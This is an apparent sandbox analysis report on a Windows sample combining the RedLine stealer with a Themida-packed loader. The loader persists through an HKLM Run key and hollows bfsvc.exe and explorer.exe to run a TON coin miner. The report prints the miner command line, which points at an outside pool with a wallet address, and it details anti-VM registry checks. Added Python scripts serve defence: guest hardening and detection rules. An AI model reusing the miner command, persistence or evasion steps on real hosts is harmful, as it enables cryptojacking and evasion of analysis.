Analysis
max time kernel: 161s
max time network: 169s
platform: windows10_x64
resource: win10-en-20211208
submitted: 21-01-2022 11:18

Static task: static1
Behavioral task: behavioral1
Sample: a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe
Resource: win10-en-20211208
General
Target: a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe
Size: 879KB
MD5: b1145a56bbeb10cb56f9482e6f0beea9
SHA1: e6d21a807cf01dffd4d03f63d816a21e9739fd6f
SHA256: a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8
SHA512: 87d72557604d0d6c3ce163a54e43ae597f93556346d13acc5028bc4904c0ad823ded6b887b2e56c94dacbc297aacaf43be675c519f11550e1c48b6e31d43bfda
Malware Config
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 4 IoCs
Processes:
resource                                                                       yara_rule
behavioral1/memory/3688-118-0x0000000000A30000-0x0000000000B0C000-memory.dmp   family_redline
behavioral1/memory/3688-119-0x0000000000A30000-0x0000000000B0C000-memory.dmp   family_redline
behavioral1/memory/3688-124-0x0000000000A30000-0x0000000000B0C000-memory.dmp   family_redline
behavioral1/memory/3688-125-0x0000000000A30000-0x0000000000B0C000-memory.dmp   family_redline
PID 3688 is the submitted sample itself. The flagged region is its own image (880KB at 0x00A30000, matching the 879KB file on disk), so the RedLine match is on the unpacked .NET payload in the first-stage process, not on anything it dropped.
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Downloads MZ/PE file
Executes dropped EXE 11 IoCs
Processes:
pid    process
4348   fl.exe
1432   RegHost.exe
2696   RegHost.exe
4900   RegHost.exe
4948   RegHost.exe
2660   RegHost.exe
4536   RegHost.exe
2124   RegHost.exe
1032   RegHost.exe
3236   RegHost.exe
3404   RegHost.exe
UPX packed file 1 IoCs
Processes:
resource                                                                       yara_rule
behavioral1/memory/3192-149-0x0000000140000000-0x000000014274C000-memory.dmp   upx
PID 3192 is the bfsvc.exe child that fl.exe (PID 4348) wrote into and set the thread context of. The 39.3MB UPX-packed region sits at 0x140000000, the default x64 image base, and is the payload written into the hollowed process; its command line (see the process tree) shows it to be a TON miner, so the UPX match belongs to the miner, not to the real bfsvc.exe.
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description         ioc                                                                process
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion   fl.exe
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion    fl.exe
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion   RegHost.exe (each of the 10 instances)
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion    RegHost.exe (each of the 10 instances)
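The two registry values above are exactly what a sandbox operator should inspect on their own guests. The script below is an added example (Python, not the sample's code and not part of this report): it reads the same SystemBiosVersion and VideoBiosVersion values the sample queries and matches them against hypervisor strings. The VM_MARKERS table and the VBOX__ ACPI key paths are assumptions of this example (the report names the signature but not the keys it inspects); the two input records are constructed, not captured from this run.

```python
"""Reproduce the VM fingerprint lookups this sample performs.

Added example; not the sample's code. Checks the registry values listed under
"Checks BIOS information in registry" and the VirtualBox ACPI table keys that
"Identifies VirtualBox via ACPI registry values" refers to (key names assumed).
"""
from __future__ import annotations

from typing import Iterable

BIOS_KEY = r"HARDWARE\DESCRIPTION\System"
BIOS_VALUES = ("SystemBiosVersion", "VideoBiosVersion")
# VirtualBox ships ACPI tables with OEM id "VBOX"; Windows mirrors them under
# HKLM\HARDWARE\ACPI\<table>\VBOX__ (assumed list of table names).
VBOX_ACPI_KEYS = (
    r"HARDWARE\ACPI\DSDT\VBOX__",
    r"HARDWARE\ACPI\FADT\VBOX__",
    r"HARDWARE\ACPI\RSDT\VBOX__",
)
# Substring -> product, matched case-insensitively. Assumed list; extend it
# from the BIOS strings of your own fleet.
VM_MARKERS = {
    "vbox": "VirtualBox",
    "virtualbox": "VirtualBox",
    "vmware": "VMware",
    "qemu": "QEMU",
    "bochs": "Bochs",
    "xen": "Xen",
    "parallels": "Parallels",
    "vrtual": "Hyper-V",
}


def classify(values: dict[str, list[str]], acpi_keys: Iterable[str] = ()) -> list[str]:
    """Return the hypervisors implied by the BIOS strings and present ACPI keys.

    `values` maps a value name to its strings, the shape winreg returns for a
    REG_MULTI_SZ value. An empty result means nothing looked like a VM.
    """
    found: set[str] = set()
    for strings in values.values():
        for s in strings:
            low = s.lower()
            for marker, product in VM_MARKERS.items():
                if marker in low:
                    found.add(product)
    if any(k.upper().endswith("\\VBOX__") for k in acpi_keys):
        found.add("VirtualBox")
    return sorted(found)


def read_live() -> tuple[dict[str, list[str]], list[str]]:
    """Read the same values the sample reads. Windows only; elsewhere it
    returns empty structures so the classifier can still be exercised."""
    try:
        import winreg  # type: ignore[import-not-found]
    except ImportError:
        return {}, []
    values: dict[str, list[str]] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, BIOS_KEY) as key:
        for name in BIOS_VALUES:
            try:
                data, _ = winreg.QueryValueEx(key, name)
            except OSError:
                continue
            values[name] = list(data) if isinstance(data, list) else [str(data)]
    present: list[str] = []
    for path in VBOX_ACPI_KEYS:
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path))
            present.append(path)
        except OSError:
            pass
    return values, present


# Constructed inputs (illustrative strings, not values captured in this run).
VBOX_GUEST = {
    "SystemBiosVersion": ["VBOX   - 1"],
    "VideoBiosVersion": ["Oracle VM VirtualBox Version 6.1.30"],
}
PHYSICAL_HOST = {
    "SystemBiosVersion": ["DELL   - 1072009", "1.14.0"],
    "VideoBiosVersion": ["Intel Video BIOS"],
}

if __name__ == "__main__":
    for label, vals in (("VirtualBox guest", VBOX_GUEST), ("physical host", PHYSICAL_HOST)):
        print(f"{label}: {classify(vals) or 'no hypervisor markers'}")
    live_values, live_acpi = read_live()
    if live_values or live_acpi:
        print("this machine:", classify(live_values, live_acpi) or "no hypervisor markers")
```

If `classify(*read_live())` is non-empty on a sandbox guest, this sample (and anything using the same checks) will see the guest as a VM; the fix is to change the guest's BIOS strings and ACPI OEM id at the hypervisor, not in the registry, because the registry values are regenerated from firmware at boot.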
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Themida packer
Processes:
resource                                                                     yara_rule
C:\Users\Admin\AppData\Local\Temp\fl.exe (2 file hits)                       themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe (11 file hits)          themida
behavioral1/memory/4348-146, -147, -148  0x00007FF782200000-0x00007FF78263B000  themida   (fl.exe)
behavioral1/memory/1432-154, -155, -156  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/2696-161, -162, -163  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/4900-168, -169, -170  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/4948-175, -176, -177  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/2660-182, -183, -184  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/4536-189, -190, -191  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/2124-196, -197, -198  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/1032-203, -204, -205  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/3236-210, -211, -212  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
behavioral1/memory/3404-217, -218, -219  0x00007FF619400000-0x00007FF61983B000  themida   (RegHost.exe)
The same 4.2MB Themida-protected image appears in fl.exe and in every RegHost.exe instance, and the Downloads section shows identical hashes for both files: RegHost.exe is fl.exe copied into the persistence path. Themida's anti-debug and anti-VM layers explain the BIOS and UAC registry reads done by all eleven processes.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
description       ioc                                                                                                                              process
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"   fl.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"   RegHost.exe (each of the 10 instances)
The value is written under HKLM rather than HKCU, which requires an elevated token; the sandbox user is an administrator, so the write succeeded here. Each RegHost.exe instance re-sets the same value, so removing the key without stopping every running instance is not enough.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Checks whether UAC is enabled 11 IoCs
Reads the EnableLUA value under Policies\System; a value of 0 means UAC is turned off on the host.
Processes:
description         ioc                                                                                     process
Key value queried   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   fl.exe
Key value queried   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   RegHost.exe (each of the 10 instances)
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid    process
3688   a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe
Suspicious use of SetThreadContext 22 IoCs
Processes:
description             pid    process       target pid   target process
set thread context of   4348   fl.exe        3192         bfsvc.exe
set thread context of   4348   fl.exe        1060         explorer.exe
set thread context of   1432   RegHost.exe   1748         bfsvc.exe
set thread context of   1432   RegHost.exe   2064         explorer.exe
set thread context of   2696   RegHost.exe   4248         bfsvc.exe
set thread context of   2696   RegHost.exe   4792         explorer.exe
set thread context of   4900   RegHost.exe   3080         bfsvc.exe
set thread context of   4900   RegHost.exe   4832         explorer.exe
set thread context of   4948   RegHost.exe   5016         bfsvc.exe
set thread context of   4948   RegHost.exe   696          explorer.exe
set thread context of   2660   RegHost.exe   4916         bfsvc.exe
set thread context of   2660   RegHost.exe   2372         explorer.exe
set thread context of   4536   RegHost.exe   1704         bfsvc.exe
set thread context of   4536   RegHost.exe   1104         explorer.exe
set thread context of   2124   RegHost.exe   2036         bfsvc.exe
set thread context of   2124   RegHost.exe   2900         explorer.exe
set thread context of   1032   RegHost.exe   4232         bfsvc.exe
set thread context of   1032   RegHost.exe   3472         explorer.exe
set thread context of   3236   RegHost.exe   3960         bfsvc.exe
set thread context of   3236   RegHost.exe   4100         explorer.exe
set thread context of   3404   RegHost.exe   3852         bfsvc.exe
set thread context of   3404   RegHost.exe   3536         explorer.exe
Every loader instance creates one bfsvc.exe and one explorer.exe child and rewrites the main thread context of each. Together with the WriteProcessMemory entries into the same PIDs this is the process-hollowing sequence (create suspended, write payload, set context, resume): the children keep the legitimate image path but execute the injected code.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The generic signature text rates this as likely ransomware behaviour; nothing else in this report supports that reading (no encryption or file-renaming activity is recorded), and the rest of the run points to a coin miner plus the RedLine stealer payload, for which drive enumeration is ordinary host profiling.
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid    process                                                                   events
3688   a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe     3
1060   explorer.exe                                                              20
2064   explorer.exe                                                              30
4792   explorer.exe                                                              11
The explorer.exe PIDs here (1060, 2064, 4792) are the hollowed children of fl.exe and the first two RegHost.exe instances, not the desktop shell; the process enumeration is the injected code's work. The list stops at the 64-entry cap.
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description               pid    process
Token: SeDebugPrivilege   3688   a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description          pid    process                                                                 target pid   target process   writes
wrote to memory of   3688   a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe   4348         fl.exe           2
wrote to memory of   4348   fl.exe                                                                  3192         bfsvc.exe        9
wrote to memory of   4348   fl.exe                                                                  1060         explorer.exe     17
wrote to memory of   1060   explorer.exe                                                            1432         RegHost.exe      2
wrote to memory of   1432   RegHost.exe                                                             1748         bfsvc.exe        9
wrote to memory of   1432   RegHost.exe                                                             2064         explorer.exe     17
wrote to memory of   2064   explorer.exe                                                            2696         RegHost.exe      2
wrote to memory of   2696   RegHost.exe                                                             4248         bfsvc.exe        6 (list cut off by the 64-entry cap)
The 9 writes into each bfsvc.exe child and 17 into each explorer.exe child are the payload being copied into the suspended process section by section before the SetThreadContext call; the two-write entries for fl.exe and RegHost.exe are far smaller and match ordinary process start-up. The pattern repeats for every remaining RegHost.exe instance, as the process tree shows, but the report stops listing after 64 entries.
Processes

[1] C:\Users\Admin\AppData\Local\Temp\a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe
    "C:\Users\Admin\AppData\Local\Temp\a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe"
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[2] C:\Users\Admin\AppData\Local\Temp\fl.exe
    "C:\Users\Admin\AppData\Local\Temp\fl.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

[3] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[3] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

[4] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

[5] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[5] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

[6] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

[7] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[7] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"
    - Suspicious behavior: EnumeratesProcesses

[8] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[9] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[9] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"

[10] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[11] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[11] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"

[12] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[13] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[13] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"

[14] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[15] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[15] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"

[16] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[17] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[17] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"

[18] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[19] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[19] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"

[20] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[21] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[21] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"

[22] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[23] C:\Windows\bfsvc.exe
    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm

[23] C:\Windows\explorer.exe
    C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"

Reading the tree: the number in brackets is the nesting depth. C:\Windows\bfsvc.exe (the Boot File Servicing utility) and C:\Windows\explorer.exe are legitimate Windows binaries; neither takes mining arguments. Each fl.exe / RegHost.exe instance starts one of each, writes into it (WriteProcessMemory) and resets its thread context (SetThreadContext), so what runs under those names is the injected payload. The bfsvc.exe command line is a TON miner pointed at https://server1.whalestonpool.com with the wallet EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm as the pool user; the explorer.exe arguments carry the same wallet, the detected display adapter ("Microsoft Basic Display Adapter", i.e. no usable GPU in the sandbox) and the coin name. The hollowed explorer.exe then launches a fresh copy of RegHost.exe, which repeats the cycle, so the chain reaches depth 23 within the 161s run: on a real host this works as a respawn loop that keeps a miner alive, on top of the HKLM Run key that relaunches RegHost.exe at logon.
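The tree above, together with the SetThreadContext, WriteProcessMemory and Run-key signatures, gives a handful of host-level detections that do not depend on the file hash alone. The script below is an added example (Python; not Triage's and not the sample's code) that encodes them as rules over process-creation and registry-set events. Field names follow Sysmon's Image / CommandLine / ParentImage / TargetObject / Details, but the events are constructed from this report's tree, not captured telemetry; the rule names and the miner-argument regex are this example's own.

```python
"""Detections for the behaviours in this report's process tree and signatures.

Added example, not part of the sandbox report. Rules:
  known-hash        image hash equals the dropped fl.exe / RegHost.exe
  persistence-path  image is %APPDATA%\\Microsoft\\RegHost.exe
  miner-cmdline     a hollowed Windows binary carries miner switches
  hollowed-lolbin   bfsvc.exe / explorer.exe started by a parent under AppData
  run-key-appdata   a Run value is set to an executable under AppData
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators taken from the report.
DROPPED_SHA256 = "b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb"
PERSIST_SUFFIX = "\\appdata\\roaming\\microsoft\\reghost.exe"
RUN_KEY_MARK = "\\currentversion\\run\\"
# Windows binaries the sample hollows. bfsvc.exe (Boot File Servicing) and
# explorer.exe are never miners and are not normally started by anything
# that lives under a user profile.
HOLLOW_TARGETS = {"c:\\windows\\bfsvc.exe", "c:\\windows\\explorer.exe"}
# Miner-style switches as seen on the bfsvc.exe command line (assumed set).
MINER_ARGS = re.compile(r"(?:^|\s)(?:--pool|--user|-a\s+ton)\b", re.IGNORECASE)


@dataclass
class Event:
    kind: str                 # "process" (Sysmon 1) or "registry" (Sysmon 13)
    image: str = ""
    command_line: str = ""
    parent_image: str = ""
    sha256: str = ""
    target_object: str = ""   # registry path, registry events only
    details: str = ""         # registry value data, registry events only


def evaluate(ev: Event) -> list[str]:
    """Return the names of the rules the event triggers (empty if benign)."""
    hits: list[str] = []
    image, parent = ev.image.lower(), ev.parent_image.lower()
    if ev.kind == "process":
        if ev.sha256.lower() == DROPPED_SHA256:
            hits.append("known-hash")
        if image.endswith(PERSIST_SUFFIX):
            hits.append("persistence-path")
        if image in HOLLOW_TARGETS and MINER_ARGS.search(ev.command_line):
            hits.append("miner-cmdline")
        if image in HOLLOW_TARGETS and "\\appdata\\" in parent:
            hits.append("hollowed-lolbin")
    elif ev.kind == "registry":
        if RUN_KEY_MARK in ev.target_object.lower() and "\\appdata\\" in ev.details.lower():
            hits.append("run-key-appdata")
    return hits


def scan(events: list[Event]) -> list[tuple[int, list[str]]]:
    """Evaluate every event; return (index, hits) for those that fire."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]


WALLET = "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm"
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\a2169db0fe5dc66d6a207a3d7adfe163decda2922c1980fc6d67e0a10638f9f8.exe"
FL = r"C:\Users\Admin\AppData\Local\Temp\fl.exe"
REGHOST = r"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"

# Constructed events mirroring the tree; the last one is a normal shell start
# and must not fire.
SAMPLE_EVENTS = [
    Event("process", image=FL, command_line=f'"{FL}"', parent_image=SAMPLE, sha256=DROPPED_SHA256),
    Event("process", image=r"C:\Windows\bfsvc.exe",
          command_line=f"C:\\Windows\\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user {WALLET}",
          parent_image=FL),
    Event("process", image=r"C:\Windows\explorer.exe",
          command_line=f'C:\\Windows\\explorer.exe "{WALLET}" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"',
          parent_image=FL),
    Event("process", image=REGHOST, command_line=f'"{REGHOST}"',
          parent_image=r"C:\Windows\explorer.exe", sha256=DROPPED_SHA256),
    Event("registry", image=REGHOST,
          target_object=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost", details=REGHOST),
    Event("process", image=r"C:\Windows\explorer.exe", command_line=r"C:\Windows\explorer.exe",
          parent_image=r"C:\Windows\System32\userinit.exe"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"event {i}: {', '.join(hits)}  <- {ev.command_line or ev.target_object}")
```

The hash rule only catches this exact build; the other four survive a repack, because they key on what the loader has to do (live in a user-writable path, register itself at logon, and drive a Windows binary that never legitimately takes those arguments or that parent). The hollowed-lolbin rule is deliberately parent-based rather than argument-based so that the argument-free explorer.exe respawn at deeper levels of the tree is still caught.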
Network

MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\fl.exe (listed twice)
MD5      600c20e18834769dc0ae528c69108a5d
SHA1     743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256   b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA512   36079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe (listed 11 times, one per copy)
MD5      600c20e18834769dc0ae528c69108a5d
SHA1     743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256   b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA512   36079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec

Every entry carries the same hashes: RegHost.exe is a byte-for-byte copy of fl.exe placed in the persistence path, so one file hash covers both the dropper stage and the persisted loader.
Memory dumps

Regions of 168KB at 0x140000000 belong to the hollowed explorer.exe children (PIDs 696, 1060, 1104, 2064, 2372, 2900, 3472); the 39.3MB region in PID 3192 is the miner in the hollowed bfsvc.exe; the 4.2MB regions at 0x00007FF619400000 are the Themida-packed RegHost.exe image and the one at 0x00007FF782200000 the same image loaded as fl.exe. PID 3688 is the submitted sample; its 880KB region at 0x00A30000 is the RedLine-flagged image, and the 1.8MB and 964KB regions at 0x767B0000 and 0x77550000 lie in the system DLL range.

dump                                                                size
memory/696-180-0x0000000140000000-0x000000014002A000-memory.dmp     168KB
memory/1032-205-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/1032-204-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/1032-203-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/1060-151-0x0000000140000000-0x000000014002A000-memory.dmp    168KB
memory/1060-150-0x0000000140000000-0x000000014002A000-memory.dmp    168KB
memory/1104-194-0x0000000140000000-0x000000014002A000-memory.dmp    168KB
memory/1432-156-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/1432-155-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/1432-154-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2064-159-0x0000000140000000-0x000000014002A000-memory.dmp    168KB
memory/2124-198-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2124-196-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2124-197-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2372-187-0x0000000140000000-0x000000014002A000-memory.dmp    168KB
memory/2660-182-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2660-183-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2660-184-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
